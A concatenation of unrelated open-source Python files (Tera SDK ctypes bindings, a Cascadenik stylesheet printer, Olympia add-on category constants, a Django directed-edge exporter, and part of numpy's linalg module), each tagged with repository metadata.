lib.tera_row_mutation_put_int64.argtypes = [c_void_p, c_char_p,
c_char_p, c_uint64, c_int64]
lib.tera_row_mutation_put_int64.restype = None
lib.tera_row_mutation_set_callback.argtypes = [c_void_p, MUTATION_CALLBACK]
lib.tera_row_mutation_set_callback.restype = None
lib.tera_row_mutation_delete_column.argtypes = [c_void_p, c_char_p,
c_char_p, c_uint64]
lib.tera_row_mutation_delete_column.restype = None
lib.tera_row_mutation_delete_family.argtypes = [c_void_p, c_char_p]
lib.tera_row_mutation_delete_family.restype = None
lib.tera_row_mutation_delete_row.argtypes = [c_void_p]
lib.tera_row_mutation_delete_row.restype = None
lib.tera_row_mutation_rowkey.argtypes = [c_void_p,
POINTER(POINTER(c_ubyte)),
POINTER(c_uint64)]
lib.tera_row_mutation_rowkey.restype = None
lib.tera_row_mutation_delete_column_all_versions.argtypes =\
[c_void_p, c_char_p, c_char_p, c_uint64]
lib.tera_row_mutation_delete_column_all_versions.restype = None
lib.tera_row_mutation_delete_column_with_version.argtypes =\
[c_void_p, c_char_p, c_char_p, c_uint64, c_int64]
lib.tera_row_mutation_delete_column_with_version.restype = None
def init_function_prototype_for_row_reader():
""" row_reader """
lib.tera_row_reader.argtypes = [c_void_p, c_char_p, c_uint64]
lib.tera_row_reader.restype = c_void_p
lib.tera_row_reader_add_column_family.argtypes = [c_void_p, c_char_p]
lib.tera_row_reader_add_column_family.restype = None
lib.tera_row_reader_add_column.argtypes = [c_void_p, c_char_p,
c_char_p, c_uint64]
lib.tera_row_reader_add_column.restype = None
lib.tera_row_reader_set_callback.argtypes = [c_void_p, READER_CALLBACK]
lib.tera_row_reader_set_callback.restype = None
lib.tera_row_reader_set_timestamp.argtypes = [c_void_p, c_int64]
lib.tera_row_reader_set_timestamp.restype = None
lib.tera_row_reader_set_time_range.argtypes = [c_void_p, c_int64, c_int64]
lib.tera_row_reader_set_time_range.restype = None
lib.tera_row_reader_set_snapshot.argtypes = [c_void_p, c_uint64]
lib.tera_row_reader_set_snapshot.restype = None
lib.tera_row_reader_set_max_versions.argtypes = [c_void_p, c_uint32]
lib.tera_row_reader_set_max_versions.restype = None
lib.tera_row_reader_set_timeout.argtypes = [c_void_p, c_int64]
lib.tera_row_reader_set_timeout.restype = None
lib.tera_row_reader_done.argtypes = [c_void_p]
lib.tera_row_reader_done.restype = c_bool
lib.tera_row_reader_next.argtypes = [c_void_p]
lib.tera_row_reader_next.restype = None
lib.tera_row_reader_rowkey.argtypes = [c_void_p,
POINTER(POINTER(c_ubyte)),
POINTER(c_uint64)]
lib.tera_row_reader_rowkey.restype = None
lib.tera_row_reader_value.argtypes = [c_void_p,
POINTER(POINTER(c_ubyte)),
POINTER(c_uint64)]
lib.tera_row_reader_value.restype = None
lib.tera_row_reader_value_int64.argtypes = [c_void_p]
lib.tera_row_reader_value_int64.restype = c_int64
lib.tera_row_reader_family.argtypes = [c_void_p,
POINTER(POINTER(c_ubyte)),
POINTER(c_uint64)]
lib.tera_row_reader_family.restype = None
lib.tera_row_reader_qualifier.argtypes = [c_void_p,
POINTER(POINTER(c_ubyte)),
POINTER(c_uint64)]
lib.tera_row_reader_qualifier.restype = None
lib.tera_row_reader_timestamp.argtypes = [c_void_p]
lib.tera_row_reader_timestamp.restype = c_int64
lib.tera_row_reader_get_status_code.argtypes = [c_void_p]
lib.tera_row_reader_get_status_code.restype = c_int64
lib.tera_row_reader_destroy.argtypes = [c_void_p]
lib.tera_row_reader_destroy.restype = None
def init_function_prototype():
""" init function prototype """
init_function_prototype_for_client()
init_function_prototype_for_table()
init_function_prototype_for_row_reader()
init_function_prototype_for_row_mutation()
init_function_prototype_for_scan()
libc.free.argtypes = [c_void_p]
libc.free.restype = None
def copy_string_to_user(value, size):
""" copy string """
result = string_at(value, size)
libc.free(value)
return result
try:
lib = cdll.LoadLibrary('./libtera_c.so')
except OSError:
lib = cdll.LoadLibrary('libtera_c.so')
libc = cdll.LoadLibrary('libc.so.6')
init_function_prototype()
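# Illustrative end-to-end sketch (hypothetical flag file, table and key
# names): synchronous put/get plus a bounded scan, mirroring the flow that
# sample.py is said to demonstrate.
def _demo_sync_usage():
    client = Client("./tera.flag", "demo")
    table = client.OpenTable("demo_table")
    try:
        table.Put("row1", "cf0", "qu0", "hello")
        print(table.Get("row1", "cf0", "qu0", 0))
        desc = ScanDescriptor("row0")
        desc.SetEnd("row9")
        stream = table.Scan(desc)
        desc.Destroy()
        while not stream.Done():
            print("%s %s %s" % (stream.RowName(), stream.ColumnName(),
                                stream.Value()))
            stream.Next()
        stream.Destroy()
    finally:
        table.Close()
        client.Close()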
| BaiduPS/tera | src/sdk/python/TeraSdk.py | Python | bsd-3-clause | 39,743 |
#!/usr/bin/env python
import sys
import os.path
import optparse
import cascadenik
# monkey with sys.path due to some weirdness inside cssutils
sys.path.append(os.path.dirname(os.path.realpath(__file__)))
from cssutils.tokenize2 import Tokenizer as cssTokenizer
def main(filename):
""" Given an input file containing nothing but styles, print out an
unrolled list of declarations in cascade order.
"""
    content = open(filename, 'r').read()
    declarations = cascadenik.stylesheet_declarations(content, is_merc=True)
for dec in declarations:
print dec.selector,
print '{',
print dec.property.name+':',
if cascadenik.style.properties[dec.property.name] in (cascadenik.style.color, cascadenik.style.boolean, cascadenik.style.numbers):
print str(dec.value.value)+';',
elif cascadenik.style.properties[dec.property.name] is cascadenik.style.uri:
print 'url("'+str(dec.value.value)+'");',
elif cascadenik.style.properties[dec.property.name] is str:
print '"'+str(dec.value.value)+'";',
elif cascadenik.style.properties[dec.property.name] in (int, float) or type(cascadenik.style.properties[dec.property.name]) is tuple:
print str(dec.value.value)+';',
print '}'
return 0
parser = optparse.OptionParser(usage="""cascadenik-style.py <style file>""")
if __name__ == '__main__':
(options, args) = parser.parse_args()
if not args:
parser.error('Please specify a .mss file')
stylefile = args[0]
if not stylefile.endswith('.mss'):
parser.error('Only accepts an .mss file')
sys.exit(main(stylefile))
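# Illustrative invocation (hypothetical stylesheet name); main() prints each
# declaration as "<selector> { <property>: <value>; }":
#
#     $ python cascadenik-style.py map-styles.mss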
| mapnik/Cascadenik | cascadenik-style.py | Python | bsd-3-clause | 1,717 |
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext_lazy as _
from olympia.constants.applications import (
ANDROID, FIREFOX, SEAMONKEY, THUNDERBIRD)
from olympia.constants.base import (
ADDON_DICT, ADDON_EXTENSION, ADDON_LPAPP, ADDON_PERSONA, ADDON_SEARCH,
ADDON_SLUGS, ADDON_STATICTHEME, ADDON_THEME)
class StaticCategory(object):
"""Helper to populate `CATEGORIES` and provide some helpers.
    Note that every instance is immutable, to avoid changing values on
    the globally unique instances during test runs, which can lead to
    hard-to-debug, sporadic test failures.
"""
def __init__(self, id=None, app=None, type=None, misc=False,
name=None, slug=None, weight=0, description=None):
# Avoid triggering our own __setattr__ implementation
# to keep immutability intact but set initial values.
object.__setattr__(self, 'id', id)
object.__setattr__(self, 'application', app)
object.__setattr__(self, 'misc', misc)
object.__setattr__(self, 'name', name)
object.__setattr__(self, 'slug', slug)
object.__setattr__(self, 'type', type)
object.__setattr__(self, 'weight', weight)
object.__setattr__(self, 'description', description)
def __unicode__(self):
return unicode(self.name)
def __repr__(self):
return u'<%s: %s (%s)>' % (
self.__class__.__name__, self.__unicode__(), self.application)
def get_url_path(self):
try:
type = ADDON_SLUGS[self.type]
except KeyError:
type = ADDON_SLUGS[ADDON_EXTENSION]
return reverse('browse.%s' % type, args=[self.slug])
def _immutable(self, *args):
raise TypeError('%r instances are immutable' %
self.__class__.__name__)
__setattr__ = __delattr__ = _immutable
del _immutable
CATEGORIES = {
FIREFOX.id: {
ADDON_EXTENSION: {
'alerts-updates': StaticCategory(
id=72, name=_(u'Alerts & Updates')),
'appearance': StaticCategory(id=14, name=_(u'Appearance')),
'bookmarks': StaticCategory(id=22, name=_(u'Bookmarks')),
'download-management': StaticCategory(
id=5, name=_(u'Download Management')),
'feeds-news-blogging': StaticCategory(
id=1, name=_(u'Feeds, News & Blogging')),
'games-entertainment': StaticCategory(
id=142, name=_(u'Games & Entertainment')),
'language-support': StaticCategory(
id=37, name=_(u'Language Support')),
'photos-music-videos': StaticCategory(
id=38, name=_(u'Photos, Music & Videos')),
'privacy-security': StaticCategory(
id=12, name=_(u'Privacy & Security')),
'search-tools': StaticCategory(id=13, name=_(u'Search Tools')),
'shopping': StaticCategory(id=141, name=_(u'Shopping')),
'social-communication': StaticCategory(
id=71, name=_(u'Social & Communication')),
'tabs': StaticCategory(id=93, name=_(u'Tabs')),
'web-development': StaticCategory(
id=4, name=_(u'Web Development')),
'other': StaticCategory(id=73, name=_(u'Other'), weight=333)
},
ADDON_THEME: {
'animals': StaticCategory(id=30, name=_(u'Animals')),
'compact': StaticCategory(id=32, name=_(u'Compact')),
'large': StaticCategory(id=67, name=_(u'Large')),
'miscellaneous': StaticCategory(id=21, name=_(u'Miscellaneous')),
'modern': StaticCategory(id=62, name=_(u'Modern')),
'nature': StaticCategory(id=29, name=_(u'Nature')),
'os-integration': StaticCategory(id=61, name=_(u'OS Integration')),
'retro': StaticCategory(id=31, name=_(u'Retro')),
'sports': StaticCategory(id=26, name=_(u'Sports'))
},
ADDON_STATICTHEME: {
'abstract': StaticCategory(id=300, name=_(u'Abstract')),
'causes': StaticCategory(id=320, name=_(u'Causes')),
'fashion': StaticCategory(id=324, name=_(u'Fashion')),
'film-and-tv': StaticCategory(id=326, name=_(u'Film and TV')),
'firefox': StaticCategory(id=308, name=_(u'Firefox')),
'foxkeh': StaticCategory(id=310, name=_(u'Foxkeh')),
'holiday': StaticCategory(id=328, name=_(u'Holiday')),
'music': StaticCategory(id=322, name=_(u'Music')),
'nature': StaticCategory(id=302, name=_(u'Nature')),
'other': StaticCategory(id=314, name=_(u'Other'), weight=333),
'scenery': StaticCategory(id=306, name=_(u'Scenery')),
'seasonal': StaticCategory(id=312, name=_(u'Seasonal')),
'solid': StaticCategory(id=318, name=_(u'Solid')),
'sports': StaticCategory(id=304, name=_(u'Sports')),
'websites': StaticCategory(id=316, name=_(u'Websites'))
},
ADDON_DICT: {
'general': StaticCategory(id=95, name=_(u'General'))
},
ADDON_SEARCH: {
'bookmarks': StaticCategory(id=79, name=_(u'Bookmarks')),
'business': StaticCategory(id=80, name=_(u'Business')),
'dictionaries-encyclopedias': StaticCategory(
id=81, name=_(u'Dictionaries & Encyclopedias')),
'general': StaticCategory(id=82, name=_(u'General')),
'kids': StaticCategory(id=83, name=_(u'Kids')),
'multiple-search': StaticCategory(
id=84, name=_(u'Multiple Search')),
'music': StaticCategory(id=85, name=_(u'Music')),
'news-blogs': StaticCategory(id=86, name=_(u'News & Blogs')),
'photos-images': StaticCategory(id=87, name=_(u'Photos & Images')),
'shopping-e-commerce': StaticCategory(
id=88, name=_(u'Shopping & E-Commerce')),
'social-people': StaticCategory(id=89, name=_(u'Social & People')),
'sports': StaticCategory(id=90, name=_(u'Sports')),
'travel': StaticCategory(id=91, name=_(u'Travel')),
'video': StaticCategory(id=78, name=_(u'Video'))
},
ADDON_LPAPP: {
'general': StaticCategory(id=98, name=_(u'General'))
},
ADDON_PERSONA: {
'abstract': StaticCategory(id=100, name=_(u'Abstract')),
'causes': StaticCategory(id=120, name=_(u'Causes')),
'fashion': StaticCategory(id=124, name=_(u'Fashion')),
'film-and-tv': StaticCategory(id=126, name=_(u'Film and TV')),
'firefox': StaticCategory(id=108, name=_(u'Firefox')),
'foxkeh': StaticCategory(id=110, name=_(u'Foxkeh')),
'holiday': StaticCategory(id=128, name=_(u'Holiday')),
'music': StaticCategory(id=122, name=_(u'Music')),
'nature': StaticCategory(id=102, name=_(u'Nature')),
'other': StaticCategory(id=114, name=_(u'Other')),
'scenery': StaticCategory(id=106, name=_(u'Scenery')),
'seasonal': StaticCategory(id=112, name=_(u'Seasonal')),
'solid': StaticCategory(id=118, name=_(u'Solid')),
'sports': StaticCategory(id=104, name=_(u'Sports')),
'websites': StaticCategory(id=116, name=_(u'Websites'))
}
},
ANDROID.id: {
ADDON_EXTENSION: {
'device-features-location': StaticCategory(
id=145, name=_(u'Device Features & Location')),
'experimental': StaticCategory(id=151, name=_(u'Experimental')),
'feeds-news-blogging': StaticCategory(
id=147, name=_(u'Feeds, News, & Blogging')),
'performance': StaticCategory(id=144, name=_(u'Performance')),
'photos-media': StaticCategory(id=143, name=_(u'Photos & Media')),
'security-privacy': StaticCategory(
id=149, name=_(u'Security & Privacy')),
'shopping': StaticCategory(id=150, name=_(u'Shopping')),
'social-networking': StaticCategory(
id=148, name=_(u'Social Networking')),
'sports-games': StaticCategory(id=146, name=_(u'Sports & Games')),
'user-interface': StaticCategory(
id=152, name=_(u'User Interface')),
'other': StaticCategory(id=153, name=_(u'Other'), weight=333)
}
},
THUNDERBIRD.id: {
ADDON_EXTENSION: {
'appearance': StaticCategory(
id=208, name=_(u'Appearance and Customization')),
'calendar': StaticCategory(
id=204, name=_(u'Calendar and Date/Time')),
'chat': StaticCategory(id=210, name=_(u'Chat and IM')),
'composition': StaticCategory(
id=202, name=_(u'Message Composition')),
'contacts': StaticCategory(id=23, name=_(u'Contacts')),
'folders-and-filters': StaticCategory(
id=200, name=_(u'Folders and Filters')),
'importexport': StaticCategory(id=206, name=_(u'Import/Export')),
'language-support': StaticCategory(
id=69, name=_(u'Language Support')),
'message-and-news-reading': StaticCategory(
id=58, name=_(u'Message and News Reading')),
'miscellaneous': StaticCategory(id=50, name=_(u'Miscellaneous')),
'privacy-and-security': StaticCategory(
id=66, name=_(u'Privacy and Security')),
'tags': StaticCategory(id=212, name=_(u'Tags'))
},
ADDON_THEME: {
'compact': StaticCategory(id=64, name=_(u'Compact')),
'miscellaneous': StaticCategory(id=60, name=_(u'Miscellaneous')),
'modern': StaticCategory(id=63, name=_(u'Modern')),
'nature': StaticCategory(id=65, name=_(u'Nature'))
},
ADDON_DICT: {
'general': StaticCategory(id=97, name=_(u'General'))
},
ADDON_LPAPP: {
'general': StaticCategory(id=99, name=_(u'General'))
}
},
SEAMONKEY.id: {
ADDON_EXTENSION: {
'bookmarks': StaticCategory(id=51, name=_(u'Bookmarks')),
'downloading-and-file-management': StaticCategory(
id=42, name=_(u'Downloading and File Management')),
'interface-customizations': StaticCategory(
id=48, name=_(u'Interface Customizations')),
'language-support-and-translation': StaticCategory(
id=55, name=_(u'Language Support and Translation')),
'miscellaneous': StaticCategory(
id=49, name=_(u'Miscellaneous')),
'photos-and-media': StaticCategory(
id=56, name=_(u'Photos and Media')),
'privacy-and-security': StaticCategory(
id=46, name=_(u'Privacy and Security')),
'rss-news-and-blogging': StaticCategory(
id=39, name=_(u'RSS, News and Blogging')),
'search-tools': StaticCategory(id=47, name=_(u'Search Tools')),
'site-specific': StaticCategory(id=52, name=_(u'Site-specific')),
'web-and-developer-tools': StaticCategory(
id=41, name=_(u'Web and Developer Tools'))
},
ADDON_THEME: {
'miscellaneous': StaticCategory(id=59, name=_(u'Miscellaneous'))
},
ADDON_DICT: {
'general': StaticCategory(id=96, name=_(u'General'))
},
ADDON_LPAPP: {
'general': StaticCategory(id=130, name=_(u'General'))
}
},
}
CATEGORIES_BY_ID = {}
for app in CATEGORIES:
for type_ in CATEGORIES[app]:
for slug in CATEGORIES[app][type_]:
cat = CATEGORIES[app][type_][slug]
# Flatten some values and set them, avoiding immutability
# of `StaticCategory` by calling `object.__setattr__` directly.
if slug in ('miscellaneous', 'other'):
object.__setattr__(cat, 'misc', True)
object.__setattr__(cat, 'slug', slug)
object.__setattr__(cat, 'application', app)
object.__setattr__(cat, 'type', type_)
CATEGORIES_BY_ID[cat.id] = cat
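# Illustrative sketch (assumes a loaded Django URLconf for the reverse()
# call inside get_url_path): once the loop above has flattened the tree,
# a category can be fetched by its numeric id and queried directly.
def _demo_category_lookup():
    bookmarks = CATEGORIES_BY_ID[22]  # Firefox extension category
    assert bookmarks.slug == 'bookmarks'
    assert bookmarks.application == FIREFOX.id
    assert bookmarks.type == ADDON_EXTENSION
    return bookmarks.get_url_path()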
| lavish205/olympia | src/olympia/constants/categories.py | Python | bsd-3-clause | 12,242 |
import contextlib
from directed_edge import Exporter, Item
from .utils import ident, get_database
@contextlib.contextmanager
def get_exporter(target=None):
if target is None:
target = get_database()
exporter = DjangoExporter(target)
yield exporter
exporter.finish()
class DjangoExporter(Exporter):
def export(self, item):
super(DjangoExporter, self).export(self.to_item(item))
def to_item(self, instance):
if isinstance(instance, (basestring, Item)):
return instance
        # `_Exporter__database` reaches the name-mangled private attribute of
        # the base Exporter class, which does not expose its database publicly.
        item = DjangoItem(self._Exporter__database, ident(instance))
item.add_tag(ident(type(instance)))
return item
class DjangoItem(Item):
def link_to(self, other, *args, **kwargs):
super(DjangoItem, self).link_to(ident(other), *args, **kwargs)
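# Editor's sketch of typical usage (`queryset` stands in for any iterable of
# Django model instances; not part of the original module). finish() is
# called by get_exporter() when the block exits.
def _example_export(queryset):
    with get_exporter() as exporter:
        for instance in queryset:
            exporter.export(instance)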
| thread/django-directed-edge | django_directed_edge/export.py | Python | bsd-3-clause | 813 |
"""Lite version of scipy.linalg.
Notes
-----
This module is a lite version of the linalg.py module in SciPy which
contains high-level Python interface to the LAPACK library. The lite
version only accesses the following LAPACK functions: dgesv, zgesv,
dgeev, zgeev, dgesdd, zgesdd, dgelsd, zgelsd, dsyevd, zheevd, dgetrf,
zgetrf, dpotrf, zpotrf, dgeqrf, zgeqrf, zungqr, dorgqr.
"""
from __future__ import division, absolute_import, print_function
__all__ = ['matrix_power', 'solve', 'tensorsolve', 'tensorinv', 'inv',
'cholesky', 'eigvals', 'eigvalsh', 'pinv', 'slogdet', 'det',
'svd', 'eig', 'eigh', 'lstsq', 'norm', 'qr', 'cond', 'matrix_rank',
'LinAlgError', 'multi_dot']
import warnings
from numpy.core import (
array, asarray, zeros, empty, empty_like, transpose, intc, single, double,
csingle, cdouble, inexact, complexfloating, newaxis, ravel, all, Inf, dot,
add, multiply, sqrt, maximum, fastCopyAndTranspose, sum, isfinite, size,
finfo, errstate, geterrobj, longdouble, rollaxis, amin, amax, product, abs,
broadcast, atleast_2d, intp, asanyarray, isscalar, object_, ones
)
from numpy.core.multiarray import normalize_axis_index
from numpy.lib import triu, asfarray
from numpy.linalg import lapack_lite, _umath_linalg
from numpy.matrixlib.defmatrix import matrix_power
# For Python2/3 compatibility
_N = b'N'
_V = b'V'
_A = b'A'
_S = b'S'
_L = b'L'
fortran_int = intc
# Error object
class LinAlgError(Exception):
"""
Generic Python-exception-derived object raised by linalg functions.
General purpose exception class, derived from Python's exception.Exception
class, programmatically raised in linalg functions when a Linear
Algebra-related condition would prevent further correct execution of the
function.
Parameters
----------
None
Examples
--------
>>> from numpy import linalg as LA
>>> LA.inv(np.zeros((2,2)))
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "...linalg.py", line 350,
in inv return wrap(solve(a, identity(a.shape[0], dtype=a.dtype)))
File "...linalg.py", line 249,
in solve
raise LinAlgError('Singular matrix')
numpy.linalg.LinAlgError: Singular matrix
"""
pass
# Dealing with errors in _umath_linalg
_linalg_error_extobj = None
def _determine_error_states():
global _linalg_error_extobj
errobj = geterrobj()
bufsize = errobj[0]
with errstate(invalid='call', over='ignore',
divide='ignore', under='ignore'):
invalid_call_errmask = geterrobj()[1]
_linalg_error_extobj = [bufsize, invalid_call_errmask, None]
_determine_error_states()
def _raise_linalgerror_singular(err, flag):
raise LinAlgError("Singular matrix")
def _raise_linalgerror_nonposdef(err, flag):
raise LinAlgError("Matrix is not positive definite")
def _raise_linalgerror_eigenvalues_nonconvergence(err, flag):
raise LinAlgError("Eigenvalues did not converge")
def _raise_linalgerror_svd_nonconvergence(err, flag):
raise LinAlgError("SVD did not converge")
def get_linalg_error_extobj(callback):
extobj = list(_linalg_error_extobj)
extobj[2] = callback
return extobj
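# Editor's note on how the pieces above fit together: callers build an
# extobj carrying the callback they want and hand it to a gufunc, e.g.
#     extobj = get_linalg_error_extobj(_raise_linalgerror_singular)
#     ainv = _umath_linalg.inv(a, signature='d->d', extobj=extobj)
# so a LAPACK failure inside the ufunc raises LinAlgError instead of
# silently producing nans (see solve() and inv() below).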
def _makearray(a):
new = asarray(a)
wrap = getattr(a, "__array_prepare__", new.__array_wrap__)
return new, wrap
def isComplexType(t):
return issubclass(t, complexfloating)
_real_types_map = {single : single,
double : double,
csingle : single,
cdouble : double}
_complex_types_map = {single : csingle,
double : cdouble,
csingle : csingle,
cdouble : cdouble}
def _realType(t, default=double):
return _real_types_map.get(t, default)
def _complexType(t, default=cdouble):
return _complex_types_map.get(t, default)
def _linalgRealType(t):
"""Cast the type t to either double or cdouble."""
return double
def _commonType(*arrays):
# in lite version, use higher precision (always double or cdouble)
result_type = single
is_complex = False
for a in arrays:
if issubclass(a.dtype.type, inexact):
if isComplexType(a.dtype.type):
is_complex = True
rt = _realType(a.dtype.type, default=None)
if rt is None:
# unsupported inexact scalar
raise TypeError("array type %s is unsupported in linalg" %
(a.dtype.name,))
else:
rt = double
if rt is double:
result_type = double
if is_complex:
t = cdouble
result_type = _complex_types_map[result_type]
else:
t = double
return t, result_type
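# _commonType in practice (editor's illustration): single-precision inputs
# are promoted, and one complex operand makes the whole computation complex:
#     _commonType(zeros(2, single), zeros(2, csingle)) == (cdouble, csingle)
# i.e. LAPACK runs in cdouble and the result is cast back to csingle.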
# _fastCopyAndTranspose assumes the input is 2D (as all the calls in here are).
_fastCT = fastCopyAndTranspose
def _to_native_byte_order(*arrays):
ret = []
for arr in arrays:
if arr.dtype.byteorder not in ('=', '|'):
ret.append(asarray(arr, dtype=arr.dtype.newbyteorder('=')))
else:
ret.append(arr)
if len(ret) == 1:
return ret[0]
else:
return ret
def _fastCopyAndTranspose(type, *arrays):
cast_arrays = ()
for a in arrays:
if a.dtype.type is type:
cast_arrays = cast_arrays + (_fastCT(a),)
else:
cast_arrays = cast_arrays + (_fastCT(a.astype(type)),)
if len(cast_arrays) == 1:
return cast_arrays[0]
else:
return cast_arrays
def _assertRank2(*arrays):
for a in arrays:
if a.ndim != 2:
raise LinAlgError('%d-dimensional array given. Array must be '
'two-dimensional' % a.ndim)
def _assertRankAtLeast2(*arrays):
for a in arrays:
if a.ndim < 2:
raise LinAlgError('%d-dimensional array given. Array must be '
'at least two-dimensional' % a.ndim)
def _assertSquareness(*arrays):
for a in arrays:
if max(a.shape) != min(a.shape):
raise LinAlgError('Array must be square')
def _assertNdSquareness(*arrays):
for a in arrays:
if max(a.shape[-2:]) != min(a.shape[-2:]):
raise LinAlgError('Last 2 dimensions of the array must be square')
def _assertFinite(*arrays):
for a in arrays:
if not (isfinite(a).all()):
raise LinAlgError("Array must not contain infs or NaNs")
def _isEmpty2d(arr):
# check size first for efficiency
return arr.size == 0 and product(arr.shape[-2:]) == 0
def _assertNoEmpty2d(*arrays):
for a in arrays:
if _isEmpty2d(a):
raise LinAlgError("Arrays cannot be empty")
# Linear equations
def tensorsolve(a, b, axes=None):
"""
Solve the tensor equation ``a x = b`` for x.
It is assumed that all indices of `x` are summed over in the product,
together with the rightmost indices of `a`, as is done in, for example,
``tensordot(a, x, axes=b.ndim)``.
Parameters
----------
a : array_like
Coefficient tensor, of shape ``b.shape + Q``. `Q`, a tuple, equals
the shape of that sub-tensor of `a` consisting of the appropriate
number of its rightmost indices, and must be such that
``prod(Q) == prod(b.shape)`` (in which sense `a` is said to be
'square').
b : array_like
Right-hand tensor, which can be of any shape.
axes : tuple of ints, optional
Axes in `a` to reorder to the right, before inversion.
If None (default), no reordering is done.
Returns
-------
x : ndarray, shape Q
Raises
------
LinAlgError
If `a` is singular or not 'square' (in the above sense).
See Also
--------
numpy.tensordot, tensorinv, numpy.einsum
Examples
--------
>>> a = np.eye(2*3*4)
>>> a.shape = (2*3, 4, 2, 3, 4)
>>> b = np.random.randn(2*3, 4)
>>> x = np.linalg.tensorsolve(a, b)
>>> x.shape
(2, 3, 4)
>>> np.allclose(np.tensordot(a, x, axes=3), b)
True
"""
a, wrap = _makearray(a)
b = asarray(b)
an = a.ndim
if axes is not None:
allaxes = list(range(0, an))
for k in axes:
allaxes.remove(k)
allaxes.insert(an, k)
a = a.transpose(allaxes)
oldshape = a.shape[-(an-b.ndim):]
prod = 1
for k in oldshape:
prod *= k
a = a.reshape(-1, prod)
b = b.ravel()
res = wrap(solve(a, b))
res.shape = oldshape
return res
def solve(a, b):
"""
Solve a linear matrix equation, or system of linear scalar equations.
Computes the "exact" solution, `x`, of the well-determined, i.e., full
rank, linear matrix equation `ax = b`.
Parameters
----------
a : (..., M, M) array_like
Coefficient matrix.
b : {(..., M,), (..., M, K)}, array_like
Ordinate or "dependent variable" values.
Returns
-------
x : {(..., M,), (..., M, K)} ndarray
Solution to the system a x = b. Returned shape is identical to `b`.
Raises
------
LinAlgError
If `a` is singular or not square.
Notes
-----
.. versionadded:: 1.8.0
Broadcasting rules apply, see the `numpy.linalg` documentation for
details.
The solutions are computed using LAPACK routine _gesv
`a` must be square and of full-rank, i.e., all rows (or, equivalently,
columns) must be linearly independent; if either is not true, use
`lstsq` for the least-squares best "solution" of the
system/equation.
References
----------
.. [1] G. Strang, *Linear Algebra and Its Applications*, 2nd Ed., Orlando,
FL, Academic Press, Inc., 1980, pg. 22.
Examples
--------
Solve the system of equations ``3 * x0 + x1 = 9`` and ``x0 + 2 * x1 = 8``:
>>> a = np.array([[3,1], [1,2]])
>>> b = np.array([9,8])
>>> x = np.linalg.solve(a, b)
>>> x
array([ 2., 3.])
Check that the solution is correct:
>>> np.allclose(np.dot(a, x), b)
True
"""
a, _ = _makearray(a)
_assertRankAtLeast2(a)
_assertNdSquareness(a)
b, wrap = _makearray(b)
t, result_t = _commonType(a, b)
# We use the b = (..., M,) logic, only if the number of extra dimensions
# match exactly
if b.ndim == a.ndim - 1:
if a.shape[-1] == 0 and b.shape[-1] == 0:
# Legal, but the ufunc cannot handle the 0-sized inner dims
# let the ufunc handle all wrong cases.
a = a.reshape(a.shape[:-1])
bc = broadcast(a, b)
return wrap(empty(bc.shape, dtype=result_t))
gufunc = _umath_linalg.solve1
else:
if b.size == 0:
if (a.shape[-1] == 0 and b.shape[-2] == 0) or b.shape[-1] == 0:
a = a[:,:1].reshape(a.shape[:-1] + (1,))
bc = broadcast(a, b)
return wrap(empty(bc.shape, dtype=result_t))
gufunc = _umath_linalg.solve
signature = 'DD->D' if isComplexType(t) else 'dd->d'
extobj = get_linalg_error_extobj(_raise_linalgerror_singular)
r = gufunc(a, b, signature=signature, extobj=extobj)
return wrap(r.astype(result_t, copy=False))
def tensorinv(a, ind=2):
"""
Compute the 'inverse' of an N-dimensional array.
The result is an inverse for `a` relative to the tensordot operation
``tensordot(a, b, ind)``, i. e., up to floating-point accuracy,
``tensordot(tensorinv(a), a, ind)`` is the "identity" tensor for the
tensordot operation.
Parameters
----------
a : array_like
Tensor to 'invert'. Its shape must be 'square', i. e.,
``prod(a.shape[:ind]) == prod(a.shape[ind:])``.
ind : int, optional
Number of first indices that are involved in the inverse sum.
Must be a positive integer, default is 2.
Returns
-------
b : ndarray
`a`'s tensordot inverse, shape ``a.shape[ind:] + a.shape[:ind]``.
Raises
------
LinAlgError
If `a` is singular or not 'square' (in the above sense).
See Also
--------
numpy.tensordot, tensorsolve
Examples
--------
>>> a = np.eye(4*6)
>>> a.shape = (4, 6, 8, 3)
>>> ainv = np.linalg.tensorinv(a, ind=2)
>>> ainv.shape
(8, 3, 4, 6)
>>> b = np.random.randn(4, 6)
>>> np.allclose(np.tensordot(ainv, b), np.linalg.tensorsolve(a, b))
True
>>> a = np.eye(4*6)
>>> a.shape = (24, 8, 3)
>>> ainv = np.linalg.tensorinv(a, ind=1)
>>> ainv.shape
(8, 3, 24)
>>> b = np.random.randn(24)
>>> np.allclose(np.tensordot(ainv, b, 1), np.linalg.tensorsolve(a, b))
True
"""
a = asarray(a)
oldshape = a.shape
prod = 1
if ind > 0:
invshape = oldshape[ind:] + oldshape[:ind]
for k in oldshape[ind:]:
prod *= k
else:
raise ValueError("Invalid ind argument.")
a = a.reshape(prod, -1)
ia = inv(a)
return ia.reshape(*invshape)
# Matrix inversion
def inv(a):
"""
Compute the (multiplicative) inverse of a matrix.
Given a square matrix `a`, return the matrix `ainv` satisfying
``dot(a, ainv) = dot(ainv, a) = eye(a.shape[0])``.
Parameters
----------
a : (..., M, M) array_like
Matrix to be inverted.
Returns
-------
ainv : (..., M, M) ndarray or matrix
(Multiplicative) inverse of the matrix `a`.
Raises
------
LinAlgError
If `a` is not square or inversion fails.
Notes
-----
.. versionadded:: 1.8.0
Broadcasting rules apply, see the `numpy.linalg` documentation for
details.
Examples
--------
>>> from numpy.linalg import inv
>>> a = np.array([[1., 2.], [3., 4.]])
>>> ainv = inv(a)
>>> np.allclose(np.dot(a, ainv), np.eye(2))
True
>>> np.allclose(np.dot(ainv, a), np.eye(2))
True
If a is a matrix object, then the return value is a matrix as well:
>>> ainv = inv(np.matrix(a))
>>> ainv
matrix([[-2. , 1. ],
[ 1.5, -0.5]])
Inverses of several matrices can be computed at once:
>>> a = np.array([[[1., 2.], [3., 4.]], [[1, 3], [3, 5]]])
>>> inv(a)
array([[[-2. , 1. ],
[ 1.5, -0.5]],
[[-5. , 2. ],
[ 3. , -1. ]]])
"""
a, wrap = _makearray(a)
_assertRankAtLeast2(a)
_assertNdSquareness(a)
t, result_t = _commonType(a)
if a.shape[-1] == 0:
# The inner array is 0x0, the ufunc cannot handle this case
return wrap(empty_like(a, dtype=result_t))
signature = 'D->D' if isComplexType(t) else 'd->d'
extobj = get_linalg_error_extobj(_raise_linalgerror_singular)
ainv = _umath_linalg.inv(a, signature=signature, extobj=extobj)
return wrap(ainv.astype(result_t, copy=False))
# Cholesky decomposition
def cholesky(a):
"""
Cholesky decomposition.
